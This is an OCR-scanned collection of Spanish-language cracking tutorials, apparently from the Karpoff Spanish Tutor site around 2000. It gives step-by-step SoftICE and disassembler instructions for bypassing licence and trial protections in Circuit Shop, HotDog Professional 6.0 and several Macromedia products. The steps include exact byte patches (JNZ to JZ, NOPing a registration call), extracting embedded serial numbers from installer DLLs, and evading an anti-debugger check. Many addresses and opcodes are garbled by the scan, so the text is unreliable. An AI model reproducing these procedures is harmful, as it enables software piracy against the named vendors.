recuerdan al Windows 3.1 y eso que en el copyright pone claramente 1997-2000. En fin, ya veremos... 


Bueno le decimos que OK, que sí, que ya sabemos que estamos "Unregistered", se cierra la ventana y luego cerramos 
las tres barras de herramientas para que no molesten. Vamos arriba a File y luego a Register, ...más mosqueo, ¿la 
ventana de registro es una ventana típica del Win 3.17. Esto tiene pinta de programa viejo reciclado, si tienes 
curiosidad pincha en Help y luego en Purchasing para ver cuanto pretenden cobrar por la versión completa del 
programa. 


Vamos a completar los datos que nos pide la ventana de registro, pon lo que quieras, y hacemos un Ctrl+D para saltar 
al Sice. 


AL ATAKE 


Lo primero será asignar valores a las ventanas de datos, dado que por nuestra configuración disponemos de 4 ventanas 
de datos, esto nos será util para automatizar el proceso. Así que tecleamos DEX 0 EAX y Enter, DEX 1 ES:EDI y Enter, 
DEX 2 DS:ESI y Enter, la ventana numerada como (3) yo la dejo habitualmente con el selector 30 para volcados 
puntuales, alguna busqueda, otras asignaciones, etc... Puedes pasar por las diferentes ventanas si pinchas con el ratón 
en el número entre paréntesis o en cualquier lugar de la barra de separación (arriba, donde pone byte). 


¿Ya?, pues venga, tecleando: 
:task > Veamos como se llama nuestro objetivo. 


TaskName  SS:SP  StackTop StackBot StackLow TaskDB HQueue Events 
WinWord  0000:0000 0061F000 00630000 36CE 372F 0000 


CIRC * 406F:EB96  CFCC EF36 EF36 11BE OFDF 0000 
Nuestro amigo se llama CIRC , ahora vamos a pillar las ventanas que tiene en funcionamiento: 
:hwnd CIRC 2 ¿Qué ventanas tenemos abiertas? 


WindowHandle HQueue SZ QOwner Class Name Window Procedure 


OABO (1) OFDF 16 CIRC Balloon Window  3FE7:000000DD 
ODCA (1) OFDF 16 CIRC  +t32770 (Dialog)  3E1F:000000B3 
0DC8(2) OFDF 16 CIRC Edit 3E1F:000000BA 
0DCC(2) OFDF 16 CIRC Edit 3E1F:000000AC 
0DDO(2) OFDF 32 CIRC Button 177F:00001040 
0DDA (2) OFDF 32 CIRC Button 177F:00001040 
0DD8 (2) OFDF 32 CIRC Button 177F:00001040 

A O etc. 


Parece claro que 32770 (Dialog) en 0DCA (1) es la ventana de registro, que se compone de dos "cajas" de edición 


(0DCS8 y 0DCC Name y Key respectivamente) y los tres botones del OK, Cancel y Help. Otra cosa que observamos es 
que nuestro objetivo, CIRC, parece ser de 16 bits (Columna SZ, ya me parecía, con tanta ventana del tipo W3.1) y eso 
nos obliga a asignar las ventanas de datos de nuevo, (DEX 0 AX, DEX 1 ES:DI, DEX 2 DS:SI).. También quiero 
decir que todas las direcciones que aparecen son las relativas a mi ordenador, en el vuestro obviamente serán 
diferentes. 


Bueno vamos con el primer breakpoint, directamente al primer Edit : 


:bms g 0DC8 WM_GETTEXT 3 Break en Windows message. Esto no falla (casi) nunca. 


WM_GETTEXT 


Una aplicación envía un mensaje de WM_GETTEXT para copiar el texto que corresponde a 
una ventana en un buffer proporcionado por la llamada. 


wParam = (WPARAM) cchTextMax; // el número de caracteres a copiar 
IParam = (LPARAM) IpszText; // la dirección de buffer para el texto 


Returns 
El valor de retorno es el número de caracteres copiado. 


Fuente: CRACKER“S notes by TORNODO 


Ctrl+D, volvemos al programa, le damos al OK y saltamos de nuevo al Sice con este mensaje: 


Break due to BMSG 0DCS WM_GETTEXT (ET =110.93 milliseconds) 
HWnd = 0DCS wParam = 0064 IParam = 406FE91A msg = 000D WM_GETTEXT 


Y en esta dirección (en mi cacharro): 
4797:00DD CALL 0002 


Ahora tecleamos: 
¡stack 3 A ver que tenemos por la pila. 


CIRC (52) at 37CF:0E46 [?] 
CIRC (52) at 37CF:0CDD [?] 
CIRC (3B) at 32F7:005F [?] 


CIRC (70) at 476F:0288 [2] 
USER!GETWINDOWTEXT + 001F at 179F:1065 [?] > Esto ya es más familiar, ¿eh?. 
3 CIRC .Alloc at 4797:00DD [?] 


Lo que me asombra es la cantidad de cosas que hay en la pila, la cantidad de módulos que tiene el programita de 
marras, ¿cuántos serán?, ¿se pueden ver?, ¿vamos a verlos todos?, ¿seguro?, pues venga, tecleando: 


:heap CIRC > Veamos que anda haciendo CIRC por la memoria. 


¡¡Bueno!!, Lo que hay aquí, 136 modulos diferentes cargados en memoria, (si no he contado mal), procesar todo esto 
en el W32dsmg89 llevaría un buen rato. (Y de hecho lleva un rato largo, te lo digo yo). 


A lo que íbamos, ya que tenemos el USER!GETWINDOWTEXT que ha sido cargado después del CIRC (70), parece 
lógico, pues, suponer que proviene de ahí y que si no pasa nada volveremos ahí, (ya sabes, ¿quienes somos?, ¿de 
donde venimos?, ¿a donde vamos?), por lo que vamos a hacer un break a esa dirección (insisto, en mi cacharro): 


:bpx 476F:0288 


Hacemos un Ctrl+D y aterrizamos aquí en: 476F:0288 CALL USER!GETWINDOWTEXT, una vez aquí pulsamos F10 
para pasar a la siguiente instrucción y de ahí vamos trazando el código con F8 para ver como va meneando los bytes, 
como pilla el Name, como comprueba si el Name esta en mayúsculas o minúsculas, si tiene la longitud de caracteres 
adecuada, como va haciendo el Serial, como lo compara con el número que hemos metido, etc... 


Puedes ir viendo todo esto cambiando por las diferentes ventanas de datos. Hasta que llegamos aquí: 


:62AF XOR AL, AL 
:62B1 REPNZ SCASB 3 Esto va pillando ES:DI hasta CX=0. 
:62B3 SUB BX, CX 
:62B5 MOV CX,BX 


:62B7 MOV DI, SI 3 Offset del Serial bueno a DI. 
:62B9 LDS — SL [BP+06] 3 Offset del mio en SL 
:62BC REPZ CMPSB 3 Compara DS:SI con ES:DI, serial malo con el bueno. 


:62BE MOV AL, [SI-01] 3 Carga en AL el 1er. caracter diferente de mi serial. 
:62C1 MOV BL,ES:[DI-01] 3 Carga en BL el 1er. caracter diferente del bueno. 


:62D1 RET 3 Trazando hasta aquí. 
:048C ADD  SP,0A 3 Aparecemos aquí. 

048F OR AX, AX 
:0491 JNZ  049F > ¡BINGO!, detente aquí. 


Bueno, pues esto es casi todo, ahora vamos con el ratón y ponemos el cursor encima de la dirección del salto anterior, 
le damos al botón derecho y en el menú que sale elegimos Display (es lo mismo que hacer D EIP), en la ventana de 
datos (en hexadecimal) nos aparece un 75 OC en las dos primeras posiciones. 


Muy bien, ahora apuntamos en un papel el valor de varios bytes más (75 0C B8 01 00 8D 66 FE) y vamos a probar, 
pinchamos con el ratón en el 75 y lo cambiamos por un 74, (un JNZ por un JZ), le damos al Enter, vamos a la ventana 
de comando, ahora deshabilitamos los breakpoints (BD *), así, si esto no funciona y hay que volver a empezar, basta 
con habilitarlos de nuevo con BE *, de esta forma no hay que volver a teclear los bp's otra vez. 


Salimos al programa con Ctrl+D y comprobamos el cambio. 


Perfecto, está registrado y todas las funciones habilitadas (esta versión shareware entre otras pirulas no deja imprimir, 
¡vaya morro!). Volvemos al Sice con Ctrl+D y, ahora sí, limpiamos todos los bps con BC *. 


Hacemos el último Ctrl+D para volver a Windows, cerramos todo, vamos al editor de hexadecimal, abrimos el archivo 
CIRC.EXE, buscamos la secuencia de arriba, comprobamos que sea única (apunta algún valor más por si acaso), 
cambiamos el 75 por un 74, guardamos y salimos. 


Arqueología Informática 


Como habrás podido comprobar, TODOS los archivos .EXE comienzan por MZ. 


Estas son las iniciales de Mark Zibikowski, uno de los arquitectos y padre del 
DOS. ¡Lo que ha llovido desde entonces! 


Abrimos el Circuit Shop v1.09, nos registramos adecuadamente, es decir, pones cualquier cosa y a funcionar. El 
programa siempre va a darte por válido pongas lo que pongas. Eso si. el día que aciertes con la contraseña buena sera 
cuando aparezca el mensaje de error. 


Esta es una manera de hacerlo, seguro que hay bastantes más, solo es cuestión de dedicarle un rato. 


Tu mismo... 


¿Como?, ¿Que vuelves a entrar en el programa y te dice que no estás registrado?. Claro, hay un segundo chequeo 
cuando se inicia el programa que mira en el archivo de registro y compara el Serial bueno con el que hay ahí. Busca en 
el directorio del Circuit Shop un archivo con extensión .reg y veras almacenados tus datos. 


Tienes dos opciones, o buscar el Serial bueno (has pasado por encima cuando trazabamos el código), o buscar donde 
se hace el chequeo e intentar saltarlo. 


Descubrir como se hace es cosa tuya, yo solo te he enseñado el camino. ¡Suerte!, no es tan dificil como parece. 


Karpoff Spanish Tutor: sobre 
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Programa: HotDog Professional 6.0 


PROTECCION: Limitacion de 30 días. 

Descripcion: Editor de texto para programadores de páginas Web. 
Dificultad: Principiante 

DOWNLOAD: http: //www.sausage.com (Cd-Actual n*47) 

Herramientas: N32dasm 8.93, Editor Hexadecimal, Softice 

CRACKER: KuaTo_ThoR FECHA: 31/08/2000 


INTRODUCCION 


Bueno aquí estamos de nuevo amigos, preparados para una nueva batalla. 


Creo que en este programa podremos encontrar alguna cosa curiosa, al menos es distinto a los que he podido 
ver últimamente. Nuestro objetivo será aparentar estar registrados, eliminando la limitación temporal. 


En programas con limitaciones temporales o limitaciones en el número de veces de uso lo mejor antes de 
ejecutar por primera vez el programa es poner en marcha un programa "espía", para ver donde guarda datos 
tan interesantes como: día de la primera ejecución, número de veces ejecutado, fin de la prueba, que con sólo 
borrarlos, volveremos a estar en el primer día de la prueba o incluso podremos registrarnos directamente. 
Podemos usar Filemon, Regmon y algunos otros. En este tutorial, voy a utilizar el TechFact95/98, que tomará 
una fotografía del sistema, ejecutará el programa, y luego tomará una segunda fotografía, las compara y nos 
informa de todos los cambios realizados por el programa durante su ejecución. No voy a explicar como se 
utiliza, para ello os remito al magnífico tutorial del bueno de Karpoff, que tiene en su página, en la sección 
"Trabajos Realizados con otras Herramientas" creo que trataba sobre el MemTurbo (un tutorial muy 
interesante). 


AL ATAKE 


Preliminares. Obtener información. 


Este paso es esencial, saber que nos va a pedir el programa, ver como actua, son datos que nos van a ayudar en nuestra 
labor. 


Por primera vez ejecutamos el programa usando TechFact95/98, y entre los cambios más interesantes eu realiza el 
programa se encuentra la creación de la siguiente ruta en el registro: 
[HKEY_LOCAL_ MACHINE Software WMicrosoftiShared ToolsiPRV6], esta será la localización de nuestros datos 
temporales (fecha de inicio y fecha final de ejecución), con sólo borrar esta carpeta, volveremos al primer dia de uso. 
(en este tutorial no nos servirá para mucho, pero es una buena costumbre buscar este tipo de datos). 


Más cosas, como siempre ejecutamos el programa, y nos salta una ventanita con varias opciones, además aparece el 
dia que va a caducar nuestro programa. Continuar el trial, registrarse por internet, incluso podemos meter una clave de 
registro, vamos a ver que nos pide... 


Nota: ¿son mis ojos, o el perro es horrible? ; ) 


El nombre, una dirección de correo electrónico (sin estos datos no podremos dar al OK), y luego un código que 
comienza por RK, y un identificador que empieza por ID. Rellenamos todo con lo que más nos guste, damos al OK y 
esperamos a ver ... nos aparece ''Sorry...'' comprate el programa. 


Ya sabemos algo, continuamos con la carga del programa, miramos en la ayuda buscando algo que pudiera ser 
interesante, algún tipo de limitación, pero no hay nada. Lo único es que aparece un menú llamado "Buy HotDog”, 
donde podemos registrarnos nuevamente, adquirir el programa, etc. Desde luego, este menú tiene toda la pinta de 
desaparecer en la versión registrada. 


Vamos en busca de más datos que nos puedan evitar pasar un mal rato, como por ejemplo que se nos quede colgado el 
Wdasm al intentar abrir el ejecutable por estar comprimido. Para ello podemos utilizar el GetTyp, el File Analizer y 
algunos otros. Yo voy a utilizar el GetTyp; metemos el ejecutable, y nos dice un par de cosas interesantes, la primera 
que no está comprimido, y la segunda que está compilado en Delphi. 


A por el 'mensaje' de error 


Bien, ya tenemos bastantes datos, ya sabemos que salvo que tenga una protección contra desemsamblado, no 
tendremos problemas para abrilo en el Wdasm. Pues vamos a por él (fijaos en el tamaño del archivo, 5.590 kb), 
hacemos una copia de seguridad de nuestro archivo (HotDog6.exe), la abrimos con Wdasm, y después de unos 15620 
minutos (tengo un K6-2 a 400), podremos mirar a ver que se cuece por ahí. 


Lo primero es GUARDAR el proyecto (no lo olvidéis). Ahora buscamos nuestra frase en las "String References", o 
directamente en buscar texto, pero no aparece por ninguna parte, ni tampoco aparece algo como, 'Thanks', o 
'Congratulations'. ¿ Y que hacemos ahora? Lo que yo he pensado ha sido ir a Softice, introducir los datos, meter un 
break hmemcpy y ver donde aterrizamos. (quizás alguien se haya dado cuenta de alguna frasecilla que yo pasé por alto, 
pero que finalmente será de gran utilidad, de todas formas he preferido no saltarme ningún paso de los que 
inicialmente hice, no siempre se alcanza el éxito a la primera ; ). 


Cambio de planes. 


Lo dicho, ejecutamos el programa, introducimos los datos del registro, vamos al Softice con Ctrl+D, metemos bpx 
hmemcpy (conviene tener todos los demás programas cerrados para evitar que salte un programa que no nos interesa), 
volvemos al HotDog, le damos al OK y ... estamos en Softice, pulsamos F12 hasta que veamos nuestro programa, F12, 
F12, F12, pasamos por unos cuantos User, y de repente, nos aparece Sausreg!, pero ¿qué es esto? ¿no será una dll o 
algo así que nuestro programa llama para realizar la comprobación del registro? ;-) 


Nos salimos del Softice, cerramos el programa, y buscamos en nuestro disco duro Sausreg, y nos aparece, al menos a 
mi, en CAWindowsiSystemiSausreg.exe. No es una dll, es otro ejecutable. Podemos hacer nuevamente los pasos que 
he realizado antes con el ejecutable principal, y si queremos podemos desemsamblarlo para ver que frasecitas hay por 


ahí. Pero se me han ocurrido un par de cosas que pueden ser interesantes, si encontramos en el ejecutable principal 
donde hace la llamada al otro, ¿podremos saltarnos esa llamada?, ¿podremos modificar el valor de salida de esa 
llamada?, ¿podremos algún día saber a que huele lo que no huele? ; ) 


Intentaremos buscar respuesta a algunas de estas preguntas. Para encontrar la llamada tenía pensado intentar entrar con 
Softice y ver donde salta, pero justo en ese momento se me apareció la diosa Fortuna. Al ejecutar nuevamente el 
programa vi lo siguiente: 


Yersion 6.0 


Checking Registration Status... == 


3 
A 3 1995 - 2000 Sausage Software Sausage 


Interesante frase, 'Checking Registration Status', vamos a buscarla en el Wdasm, abrimos nuestro proyecto guardado 
antes,si ya lo habíamos cerrado y buscamos la frase...¡¡¡ Ahí está!!!, nos aparece lo siguiente: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :005C8430 (U) 

| 

:005C843C AlAZAD6FOO mov eax, dword ptr [006FAOAS 
:005C8441 833800 cmp dword ptr [eax], 00000000 
:005C8444 7411 je 005C8457 

:005C8446 AlAZAD6FOO mov eax, dword ptr [006FAOASZ 
:005C844B 8B00 mov eax, dword ptr [eax] 


* Possible StringData Ref from Code Obj ->"Checking Registration Status..." 
:005C844D BADO865C00 mov edx, 005C86DO0 
:005C8452 E8SC9I7FFBFF call 00580420 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :005C8444 (C) 

| 

:005C8457 C645FE0O1 mov [ebp-02], 01 

:005C845B 8D45FE lea eax, dword ptr [ebp-02] 

:005C845E E84D7EFFFF call 005C02B0 <- Aquí se llamará a Sausreg.exe 
:005C8463 8845FF mov byte ptr [ebp-01]1, al 

:005C8466 807DFFOO cmp byte ptr [ebp-01], 00 

:005C846A 0F8416020000 je 005C8686 

:005C8470 AlAZAO6FOO mov eax, dword ptr [006FAOAS] 

:005C8475 833800 cmp dword ptr [eax], 00000000 

:005C8478 7411 Je 005C848B 

:005C847A AlAZAO6FOO mov eax, dword ptr [006FAOAS] 

:005C847F 8B00 mov eax, dword ptr [eax] 


* Possible StringData Ref from Code Obj ->"Initializing HotDog..." 


:005C8481 BAF8865C00 mov edx, 005C86F8 
:005C8486 E8957FFBFF call 00580420 


Después de ver esto, nos sube un poco el ánimo, ¡al fin hemos encontrado algo realmente interesante!. Como he puesto 


| arriba, podemos ver que en 005C845E call 005C02BO0, se llama al archivo. Lo primero que podríamos hacer es 
nopearlo para ver que pasa. Vamos a probarlo en el Softice, vamos nuevamente a esa dirección, y antes de pasarnos, 
vamos a escribir en el Softice utilizando el comando a + dirección que sirve para introducir código en la dirección 
especificada, en nuestro caso: a 5C845E, y nos aparecerá: 


>005C845E -Zona para escribir nuestra instruccion- 


Escribimos: nop y pulsamos Enter, repetimos tantas veces como nops hagan falta, en este caso 5 veces, (lo que 
hacemos es lo siguiente: ES4D7EFFFF ponemos 9090909090) para salir finalmente de la edición pulsamos Enter una 
vez más. Una vez acabado pulsamos FS para dejar correr el programa, y ¡¡¡SORPRESA!!!, el programa arranca sin 
problemas y no aparece la ventana, aunque en el programa nos sigue apareciendo el menú 'Buy HotDog'. Desde luego 
al haber eliminado la llamada al programa Sausreg.exe, ya no hay limitación en el tiempo, probadlo por si las moscas, 
adelantad el reloj un par de meses. Si nuestro objetivo fuese disfrutar del progrma por la cara, el objetivo estaría 
cumplido, pero nuestro objetivo va más allá, hay que eliminar el menú 'Buy HotDog'. 


Lo que se me ocurre es seguir esta llamada, hasta el lugar exacto donde llama a Sausreg.exe, y ver con que volvemos 
de la llamada dependiendo de la opción que seleccionemos. Para poder hacerlo utilizamos el Symbol Loader, cargamos 
el archivo (hotdog6.exe), y cuando estemos en el Softice, metemos un bpx 005C845E, y pulsamos FS. Aparecemos 
otra vez en Softice, justo en nuestra llamada, entramos dentro con F8, seguimos traceando con F10, hasta que llegamos 
a: 


:005C05C9 50 push eax 

:005C05CA 8B00 mov eax, dword ptr [eax] 

:005C05CC FF5040 call [eax+40] <-Aquí vamos a Sausreg.exe 
:005C05CF E8E460E4FF call 004066B8 

:005C05D4 8B45E8 mov eax, dword ptr [ebp-18] 

:005C05D7 33D2 xor edx, edx 

:005C05D9 E86641E4FF call 00404744 <- Cancel=>Eax=0; Try => Eax=A 
:005C05DE 740F Je 005C0O5EF <- Eax=0=> Salta; Eax<>0 => Seguimos 
:005C05E0 8B45E8 mov eax, dword ptr [ebp-18] 

:005C05E3 BAO40A5COO mov edx, 005C0A04 

:005C05E8 E85741E4FF call 00404744 

:005C05ED 7504 jne 005C05F3 


Antes de dar a F10 sobre 005C05CC, ponemos un break justo en la siguiente instrucción, bpx 53C05CF, para que no 
se nos vaya Softice sin ver que ha salido de ahí. Si cuando aparece la ventana de registro damos a Cancel al llegar a 
005C05D9, eax valdrá cero, entonces saltaremos evitando un trozo de código, por donde si hubiesemos pulsado Try, 
hubiesemos pasado. Esto nos dice que si saltamos nos vamos del programa, y si no no. Probad a dar Cancel y al llegar 
al salto invertirle, por ejemplo con R FL Z, ejecutará el programa sin más. (Incluso he llegado a 'caducar' el programa, 
y sólo con invertir ese salto, vuelve a arrancar). 


¿Qué podemos hacer ahora? Podemos volver a nopear esta llamada al archivo, si lo hacemos con softice, con a 
5C05CC y metemos nuevamente nop, esta vez sólo tres veces, veremos como el programa se cierra, como cuando 
pulsamos Cancel, por tanto se me ocurrió, además de nopear la llamada, nopear el salto 005CO5DE 740F je 
005C05EF, cambiando 740F, por 9090. Lo probamos y ... 


¡¡Arranca el Programa!! y además desapareció el menú 'Buy HotDog. 


Estos cambios se pueden hacer permanentes, mediante nuestro editor hexa favorito. Mirando los offset de las 
direcciones en el Wdasm, o en el magnífico KrackPE de nu MI T_or 


Consideraciones finales. 


¿Qué ha pasado? Desde mi humilde punto de vista, el programador hace la llamada, si salimos sin pulsar Cancel, pone 
en algún lugar un número concreto llamémosle 'X', ya sea O, 1 ó cualquier otro. Una vez fuera de la llamada, ya en el 
código del ejecutable principal, al pasar por el primer jump sin saltar evitamos irnos fuera del programa, y más 
adelante mira ese valor 'X', si es el de no registrado, deja o pone el menú 'Buy HotDog' y si es distinto, el menú no 
aparece por ninguna parte (también podría ser fruto de la casualidad, quién sabe ;-). Y como no hay más 


comprobaciones en el resto del programa esta protección cae por si sola, nos lo han puesto demasiado fácil. 

El principal error, para mi, ha sido crear un segundo ejecutable de casi 1 MB para luego consulatarla para comprobar si 
estamos registrados en un sólo punto del programa, y sin dificultarnos la opción de nopear la llamada a dicho archivo 
desde el principal. A parte de esto, ese mensaje al inicio del programa 'Comprobando el estado de Registro", 


indicándonos donde estaba la zona caliente, facilitándonos mucho el trabajo. 


Bueno, esto ha sido todo por esta vez, espero que este texto os haya servido de ayuda, y que sepáis disculpar los 
posibles errores que haya cometido en él. 


No olvidéis que nuestro objetivo sólo es aprender. Hasta la próxima... 


«porn =ézer a » 


P.D.: Si hay algo que no he dejado sufientemente claro, como por ejemplo la utilización de alguna herramienta o 
cualquier otra cosa, lo que sea, ya sabéis: kuato_thor(2 hotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: PRODUCTOS MACROMEDIA € SALES AGENT 


PROTECCIÓN: Sales Agent 3.1.X. Impresentable intento de limitación a 30 días. 


Descripción: | Hallar TODOS los códigos necesarios para REGISTRAR los programas. 


Dificultad: Aficionadillo. 


DOWNLOAD : | http://www.macromedia.com/es/ 
Herramientas: SoftICE v3.24, W32dsm89 y MS-DOS EDIT versión 2.0.026 :-)) 


CRACKER: Arkanian | FECHA: 


| INTRODUCCION 


Esto es una tomadura de pelo general. No tiene otro calificativo. Estas "protecciones comerciales” no valen ni 
siquiera el peso del plástico donde vienen envueltas. En fin, ellos sabrán porqué confian sus carísimos 
productos a la endeble "protección" de este tipo de Software. 


| 14/08/2000 


El procedimiento descrito debajo ha sido probado con ÉXITO en los siguientes productos de 
MACROMEDIA. 


COURSEBUILDER for DREAMWEAVER 
DREAMWEAVER 3 

DRUMBEAT 2000 E-COMMERCE EDITION 
DRUMBEAT 2000 JAVA SERVER PAGES 
FIREWORKS 3 

FLASH 4 


Todos estos programas son versiones limitadas de 30 días de duración pero totalmente funcionales durante 
ese periodo. 


Este es uno de esos casos donde los árboles no nos dejan ver el bosque. Por que, a fin de cuentas ¿qué es 
Sales Agent?... nada más y nada menos que una enorme y molesta NAG SCREEN, ¿qué hace falta para 
quitarla?, ...pues un código, pues vamos a buscar ese código. 


Así de simple y ...eficaz. 


AL ATAKE 


Vamos a instalar DREAMWEAVER 3 como programa de ejemplo, lo que sigue a continuación es totálmente válido 
para el resto de programas citados arriba. 


INSTALL... 
El programa se desempaqueta, aparece un viejo conocido, InstallShield, que nos cuenta no se qué del Setup, esperamos 
y aparece el Setup con la ventana de bienvenida. Aquí hacemos un alto. Minimizamos la instalación y vamos a 


CAWINDOWSITEMPA_ISTMP1.DIRY_ ISTMPO0.DIR. 


Un archivo de nombre SERIALIZATION30.DLL. llama rápidamente nuestra atención, ¿a que suena bien?, vamos a 
echar un vistazo dentro de ese archivo. 


Y vamos a usar el viejo EDIT del DOS, así que abrimos una ventana DOS, tecleamos EDIT y luego vamos a ARCHIVO, 
ABRIR, buscamos el archivo, marcamos la casilla de ABRIR BINARIO, INTRO, y ya estamos dentro. 


Parece chino ¿verdad?, pero esto da mucho juego, ahora vamos a buscar la palabra "registration", así que AIt+B e 
INTRO, ponemos la palabreja, Aceptar y mira lo que aparece: 


Números de serie y claves de registro y no solo del programa que estamos instalando también de otras versiones y de 
otros programas. Papel y lápiz y tomemos la oportuna nota de todo. 


Para el resto de programas estos son los archivos que encontramos: 


COURSEBUILDER for DREAMWEAVER: SERIALINFO.DLL (manda cojones). 

DRUMBEAT 2000 E-COMMERCE EDITION: SERIALIZATION20.DLL 

DRUMBEAT 2000 JAVA SERVER PAGES: SERIALIZATION20.DLL (el mismo que el anterior). 
FIREWORKS 3 : SERIALIZATION.DLL 

FLASH 4: INSTALER.DLL 


NANO 


Los abrimos todos con el EDIT y conseguimos un montón de números de serie y códigos de producto, ya veremos si 


podemos ponerlos en algún lado. 
Vamos a finalizar la instalación y ejecutar el programa... 
EL PROGRAMA... 


Iniciamos DREAMWEAVER 3 y conseguimos un estupendo pantallazo del SoftICE, *...fallo general de 
protección". Parece que la cosa se complica, esto me suena a un ANTI-DEBUGGER. Probemos otra vez, y 
...efectivamente, salta el SoftICE otra vez con ese mensaje de error y cuando volvemos a Windows el programa no se 
ha iniciado. 


Y ahora viene la parte rara, después del primer pantallazo del SoftICE (con el mensaje de fallo de protección) saltó 
el antivirus, un misterioso archivo llamado z36jeah0.sys había aparecido en mi disco duro y estaba tratando de hacer 
algo. 


Rapidamente lo desinfecté y lo borré, dos minutos después, con el segundo pantallazo, ¡había aparecido de nuevo!, 
lo volví a borrar, pero esto me dejo con la mosca detras de la oreja, 


Al día siguiente, metiendole mano al FIREWORKS 3 y examinando un archivo llamado rsagnt32.tty con el 
'W32dsm89, no me sorprendió nada que saltara el antivirus otra vez. Otro archivo, este de nombre z36jaezn.sys, 
habia aparecido en Cu y estaba tratando de hacer alguna cosa. 


¿Justo después del uso de un DEBUGGER?, que curioso, que salte UNA vez puede ser una casualidad, que 
salte DOS veces el antivirus es una coincidencia, pero TRES veces apunta a una conspiración. 


¿Qué son estos archivos de sistema?, ¿Quien o qué los instala?, ¿Porqué salta el antivirus?. 


Este es el registro de actividades de mi antivirus, las dos primeras entradas son cuando intentaba ejecutar el 
DREAMWEAVER 3 y la otra del FIREWORKS 3. ¿Qué podemos pensar de todo esto?. 


Registro de actividades El E3 


Registro de actividades: 115 entradas 


Fecha: 12/0800, Hora: 17:24:02, 

El archivo 

CA z36jaehO.sys 

podría estar infectado por un virus desconocido. 
El archivo ha sido reparado. 


podría estar infectado por un virus desconocido. 
El archivo ha sido reparado. 


Fecha: 13/0800, Hora: 16:02:30, 

El archivo 

CAz3bjaezn.sys 

podría estar infectado por un virus desconocido, 
El archivo ha sido reparado. 


Bueno tras este breve paréntesis, continuamos, vamos a reiniciar y NO vamos a cargar el SoftICE, para esto deberás 
añadir al autoexec.bat las siguientes lineas, (así es como lo tengo yo): 


CHOICE /T:N,5 "Cargar Debugger Soft-Ice " 


IF ERRORLEVEL 2 GOTO SEGUIR 
CMARCHIV-INUMEGANSOFTIC-1WINICE.EXE 
¿SEGUIR 


Esto te dará cinco segundos para decidir si quieres cargarlo o no cuando reinicies la máquina. Reiniciamos, no tocamos 
nada, el SoftICE no se carga. Vamos al DREAMWEAVER 3 otra vez. 


Esta vez si. Una ventana, con un enorme logotipo del producto, nos informa que nos quedan 30 dias de prueba, 
tenemos también varios botones de opción. Pulsamos sobre TRY y observamos el logotipo cuando se inicie el 
programa. 


Abajo a la izquierda aparece un número del tipo DWW300-XXXX...., ¿no lo hemos visto antes?, consulta las notas, es el 
código que identifica al producto DREAMWEAVER versión 3.0.0, subrayalo, lo necesitaremos después. Cierra el 
programa y abrelo de nuevo. 


De cabeza al botón de BUY NOW. Rellena los diversos formularios con los datos que te de la gana, es un poco 
trabajoso ya lo se. Activa lo de la tarjeta de crédito (Go offline) para no rellenar nada en esta ventana, parece ser que el 
programita "sabe" cual es el formato de los números de las tarjetas de crédito y hasta que no encuentras un formato 
válido no te deja seguir. 


En la ventana siguiente escoge MAIL/FAX. Por fin llegamos a la ventana final, pulsamos DONE y todavía nos aparece 
otra ventana que nos informa amablemente que los datos han sido registrados y que mandarán un UNLOCKING CODE 
para hacerlo totalmente funcional, es decir, sin la limitación de los 30 días. 


Salimos y volvemos a entrar en BUY NOW. La cosa ha cambiado, ya no aparecen los formularios, aparece una ventana 
con varios campos, uno con los datos que hemos puesto, otro con un PERSONAL CODE (esta atenuado) y otro en 
blanco esperando el UNLOCKING CODE. 


Vuelve atras y mira la pantalla, BUY NOW, TRY y CANCEL, y el aviso de 30 días, ¿no has visto algo parecido en algún 
otro programa?... 


Y ahora viene la parte divertida. 
HAGASE LA LUZ... 


Vamos a reiniciar y a cargar el SoftICE. Esta ventana de inicio con sus botones de BUY NOW, TRY y CANCEL, y el 
aviso de 30 días, ¿no tiene cierto parecido a la de WinZip y su aviso de 21 días? 


BUY NOW = REGISTRATION 
TRY= 1] AGREE 
CANCEL = pues CANCEL 


Así que vamos a intentar la misma estrategia que se necesita para buscar el SERIAL de WinZip. ¿A que parece una 
autentica tontería? 


Una duda: 


Cuando ejecutamos el DREAMWEAVER 3, este nos detecta el DEBUGGER y nos cuelga el proceso de ejecución, 
pero, ¿pasará lo mismo si lo cargamos con el LOADER del Sice?. 


No cuesta nada probar, ...reiniciamos y vamos al SoftICE Loader. 
SOFTICE LOADER... 


Cargamos el programa en el Loader, hacemos caso omiso al error y, saltamos a SoftICE, estamos en el punto de 
entrada al programa, en Dreamweaver3! .text + 00018E90, le damos a F10 para movernos una posición y que 
aparezca el código. Asignamos las ventanas de datos de esta forma DEX 0 EAX, DEX 1 ES:EDI, DEX 2 DS:ESL. 


Y ahora, después de lo del antivirus, sin contemplaciones: BPX GETDLGITEMTEXTA, pulsamos F5 para volver a la 
ventana del programa y... ¡ahí esta!. NO ha pasado nada, NO ha saltado el pantallazo de error cuando entra la rutina 
ANTI-DEBUGGER, NO ha saltado el antivirus, nada de nada. 


Botón de BUY NOW rellamos el UNLOCK CODE con 1234567890 (vamos a probar con diez caracteres) y le damos al 
OK. Saltamos a Soft[CE en GETDLGITEMTEXTA, dale al F11 para salir al código real y aterrizamos en RSAGNT32! 
«text + 4BD1, esto pertenece al archivo rsagnt32,.tty. 


En FLASH 4 y en DRUMBEAT 2000 este archivo tiene extensión DLL, pero el código es el mismo. 
Este es el código, creo que no hacen falta muchas explicaciones: 


* Reference To: USER32, GetDlgltemTextA. Ord: 0140h 

| 

:10005AC1 FF1570120210 Call dword ptr [10021270] “>Después de F11 caemos aquí. 
:10005AC7 BFCC8F0210 mov edi, 10028FCC $ Nuestro Serial chungo en ES:EDI. 
:10005ACC 83C9FF or ecx, FFFFFFFF 

:10005ACF 33C0 xor eax, eax 

:10005AD1 F2 repnz 

:10005AD2 AE scasb 

:10005AD3 F7D1 not ecx “9 No más caracteres. 

:10005ADS5 49 dec ecx 

:10005AD6 83F90A cmp ecx, 0000000A =$ ¿Diez carateres? 


:10005AD9 7455 je 10005B30 9 OK, saltamos... 


* Referencered by a (U)nconditional or (C)onditional Jump at Address: 
|:10005AD9(C) 

| 

:10005B30 E83BBBFFFF call 10001670=%Aterrizamos aquí. 
:10005B35 8D953CFFFFFF lea edx, dword ptr [ebp+FFFFFF3C] 


